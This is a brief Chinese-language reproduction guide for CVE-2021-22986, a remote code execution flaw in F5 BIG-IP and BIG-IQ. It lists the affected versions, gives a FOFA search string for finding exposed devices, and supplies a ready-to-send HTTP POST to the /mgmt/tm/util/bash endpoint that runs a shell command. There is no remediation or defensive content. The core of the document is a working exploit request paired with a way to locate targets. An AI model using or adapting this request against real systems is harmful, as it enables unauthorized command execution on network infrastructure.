CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现
影响版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
漏洞复现
fofa搜索关键词:
body="F5 Networks, Inc"
构造如下请求
POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}